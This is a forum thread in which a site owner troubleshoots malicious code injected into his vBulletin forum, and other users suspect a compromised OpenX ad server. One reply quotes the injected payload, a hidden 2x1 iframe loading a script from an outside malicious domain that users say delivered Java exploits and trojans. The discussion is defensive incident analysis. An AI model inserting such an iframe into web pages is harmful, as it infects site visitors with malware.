My site's been hacked..

dutchbb

Well-known member
Ok someone managed to find a leak in our site and inserted malicious code somehow.

Here's a screen of the code inserted:

source.webp


As you can see it's right after the body tag and right before the yui JS.

I'm using the following scripts:

* vBulletin 3.8.5
* OpenX v2.8.6
* Photopost 7.03
* Reviewpost 5.1
* vBSEO 3.5.2


I've been looking for the leak / code but can't seem to find anything. Any help is appreciated.
 
can you post a link?
http://forum.dutchbodybuilding.com/ make sure you have some anti-virus running. The problem is; it seems to pop up irregularly. I'm not sure what to make of it.

OpenX? Have you seen this thread:
http://xenforo.com/community/threads/warning-new-openx-exploit.3641/

Are you using the newest release of OpenX?
I posted in that thread, have been hacked too. But we're running the latest version of OpenX now. I really don't know where these viruses are coming from. I haven't seen any warnings myself, members say they get multiple trojans on their computers whilst browsing the forums...
 
Just got two java exploits when I checked your site out, and googles slapped up the warning page first :/
 
Just got two java exploits when I checked your site out, and googles slapped up the warning page first :/
Oh Google warning again too huh :(

I would appreciate if anyone can provide me with the source code of the page with the warning, maybe it shows some clue to the location.
 
Oh Google warning again too huh
frown.png


I would appreciate if anyone can provide me with the source code of the page with the warning, maybe it shows some clue to the location.

HTML:
<iframe width="2" height="1" frameborder="0" src="http://alsonatural.cz.cc/46vx79bo/counter.php?id=4"></iframe>

I see hell in there. Something, a banner maybe, is injecting the iframe.
 
Thanks. I can't find that code anywhere though. Not sure where it's located and how it got there :s

One of your banners for sure. Or, and I doubt it, your server got hacked and it's a script working from there.

I'm betting bad advertising ;D

remove all banners and run some tests, add them back until you find the culprit or follow the source of each.
 
Banners disabled. Does it persist?

Seriously if it's OpenX again I'll stop using it, that would be the third time it got hacked.
 
Banners disabled. Does it persist?
Seriously if it's OpenX again I'll stop using it, that would be the third time it got hacked.
It was the top banner I'm guessing, when i checked your site out there was a hidden iframe in the top left hand corner of your website, beside the main banner. Now it's gone and I can access your site, and the code is clean.

Does openX act as a ad server rotating banners on your site? (I dont know what openX is) It's possible one of the ads was infected and that's why only sometimes your users were affected, when that specific banner ad rotated in.

Adbrite was notorious for that ****, they took on some nasty advertisers for a while there.
 
This is happening to sites using OpenX ads. In fact, a blog used to have OpenX ads, and my antivirus was able to catch it, and I was able to close it before it did anything.

Its not just forums. Its all kinds of sites.

I think its best just to forget doing business with OpenX, at all.
 
i get the google warning, and in the warning it says "containts elements from alsonatural.cz.cc" where im assuming you might have some images from there, such as in a banner or sig or etc. Your site probably isnt hacked just the site that i mentioned is brining up the warnings.
 
It was the top banner I'm guessing, when i checked your site out there was a hidden iframe in the top left hand corner of your website, beside the main banner. Now it's gone and I can access your site, and the code is clean.

Does openX act as a ad server rotating banners on your site? (I dont know what openX is) It's possible one of the ads was infected and that's why only sometimes your users were affected, when that specific banner ad rotated in.

Adbrite was notorious for that ****, they took on some nasty advertisers for a while there.
Yes OpenX is an ad server, but these are our own banners or from advertisers we know. I'm going to look in the OpenX files if I can find anything in there.

@Carlos: yeah probably. They just can't seem to get their code secure and everything is up to date. Thanks guys.
 
A site I visit on occasion had a similiar problem, but it wasn't related to the ad software

Somehow, malicious iframe code was being inserted into the forum templates.

They were running an older version of VB 3.8
 
Yes OpenX is an ad server, but these are our own banners or from advertisers we know. I'm going to look in the OpenX files if I can find anything in there.
Because this is obviously extremely important to many, any further detail regarding this would be great.

Was the banner that caused problems hosted on your server?
In your opinion, is there a 'safe' way to use open x? for instance having all banners on the server?

Just curious if you had any further thoughts, I've not used openx.
 
Top Bottom